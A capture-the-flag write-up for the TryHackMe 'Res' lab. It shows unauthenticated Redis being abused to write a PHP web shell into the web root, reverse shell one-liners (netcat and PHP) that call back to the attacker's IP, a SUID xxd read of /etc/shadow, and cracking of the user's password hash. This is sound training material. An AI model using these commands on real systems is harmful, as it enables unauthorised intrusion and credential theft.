CTF-Writeups/TryHackMe/Res.md
2020-11-04 01:31:19 +05:00

5.4 KiB

TryHackMe-Res

Abdullah Rizwan | 12:00 AM | 4th November ,2020

NMAP

Run the scan for all ports

Nmap scan report for 10.10.199.149
Host is up (0.17s latency).
Not shown: 65533 closed ports
PORT     STATE SERVICE VERSION
80/tcp   open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
6379/tcp open  redis   Redis key-value store 6.0.7


PORT 6379

I used https://book.hacktricks.xyz/pentesting/6379-pentesting-redis to enumerate redis

nc 10.10.199.149 6379

Connect to the port using netcat and type info you'll get output like this

Now we need to use redis-cli client to interact with it more so install using apt-get install redis-tools

As you can see after installing the redis-cli we can interact with it

Lets see if we can create a php page by changing directory to where apache fetches html pages and name the page to redis.php

10.10.199.149:6379> config set dir /var/www/html
OK
10.10.199.149:6379> config set dbfilename redis.php
OK
10.10.199.149:6379> set test "<?php phpinfo(); ?>"
OK
10.10.199.149:6379> save
OK

And it works so we can confirm that we can get a shell from this , now set a GET parameter that can inovoke system commands.

10.10.199.149:6379> set test "<?php system($_GET['command']); ?>"
OK
10.10.199.149:6379> save
OK
10.10.199.149:6379> 

RCE exists so lets get a shell

php -r '$sock=fsockopen("10.14.3.143",6666);exec("/bin/sh -i <&3 >&3 2>&3");' - Didn't worked

nc -e /bin/sh 10.14.3.143 6666 - Worked !

User Flag

In /home/vianka We can find the user flag

Root Flag

Now for the root flag by looing for SUID we see that xxd has an suid bit set so it can run as root by anyone www-data@ubuntu:/$ find / -perm /4000 2>/dev/null /bin/ping /bin/fusermount /bin/mount /bin/su /bin/ping6 /bin/umount /usr/bin/chfn /usr/bin/xxd /usr/bin/newgrp /usr/bin/sudo /usr/bin/passwd /usr/bin/gpasswd /usr/bin/chsh /usr/lib/eject/dmcrypt-get-device /usr/lib/dbus-1.0/dbus-daemon-launch-helper /usr/lib/vmware-tools/bin32/vmware-user-suid-wrapper /usr/lib/vmware-tools/bin64/vmware-user-suid-wrapper www-data@ubuntu:/$ xxd /root/root.txt | xxd -r thm{xxd_pr1v_escalat1on}

www-data@ubuntu:/$ find / -perm /4000 2>/dev/null 
/bin/ping
/bin/fusermount
/bin/mount
/bin/su
/bin/ping6
/bin/umount
/usr/bin/chfn
/usr/bin/xxd
/usr/bin/newgrp
/usr/bin/sudo
/usr/bin/passwd
/usr/bin/gpasswd
/usr/bin/chsh
/usr/lib/eject/dmcrypt-get-device
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/vmware-tools/bin32/vmware-user-suid-wrapper
/usr/lib/vmware-tools/bin64/vmware-user-suid-wrapper
www-data@ubuntu:/$ xxd /root/root.txt | xxd -r
thm{xxd_pr1v_escalat1on}

Privilege Escalation

We got the root flag without even being root but I love to find a way to get root so lets do that.We know that we can read almost anyting with xxd so lets try to read /etc/shadow and crack the user's hash

xxd /etc/shadow | xxd -r

vianka:$6$2p.tSTds$qWQfsXwXOAxGJUBuq2RFXqlKiql3jxlwEWZP6CWXm7kIbzR6WzlxHR.UHmi.hc1/TuUOUBo/jWQaQtGSXwvri0:18507:0:99999:7:::

Run johntheripper on this hash

root@kali:~/TryHackMe/Easy/Res# john hash                        
Using default input encoding: UTF-8                                       
Loaded 1 password hash (sha512crypt, crypt(3) $6$ [SHA512 256/256 AVX2 4x])
Cost 1 (iteration count) is 5000 for all loaded hashes                                                                                              
Will run 4 OpenMP threads                                                                                                                           
Proceeding with single, rules:Single                                                                                                                
Press 'q' or Ctrl-C to abort, almost any other key for status
Warning: Only 3 candidates buffered for the current salt, minimum 16 needed for performance.
Warning: Only 7 candidates buffered for the current salt, minimum 16 needed for performance.
Warning: Only 9 candidates buffered for the current salt, minimum 16 needed for performance.
Warning: Only 7 candidates buffered for the current salt, minimum 16 needed for performance. 
Warning: Only 11 candidates buffered for the current salt, minimum 16 needed for performance.
Warning: Only 8 candidates buffered for the current salt, minimum 16 needed for performance.
Almost done: Processing the remaining buffered candidate passwords, if any.
Warning: Only 6 candidates buffered for the current salt, minimum 16 needed for performance.
Proceeding with wordlist:/usr/share/john/password.lst, rules:Wordlist
beautiful1       (vianka)
1g 0:00:00:04 DONE 2/3 (2020-11-04 01:25) 0.2183g/s 2533p/s 2533c/s 2533C/s maryjane1..cookies1
Use the "--show" option to display all of the cracked passwords reliably

Now login with vinanka

www-data@ubuntu:/$ su vianka
Password: 
vianka@ubuntu:/$ sudo -l
[sudo] password for vianka: 
Matching Defaults entries for vianka on ubuntu:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User vianka may run the following commands on ubuntu:
    (ALL : ALL) ALL
vianka@ubuntu:/$ sudo bash
root@ubuntu:/# 

We are root !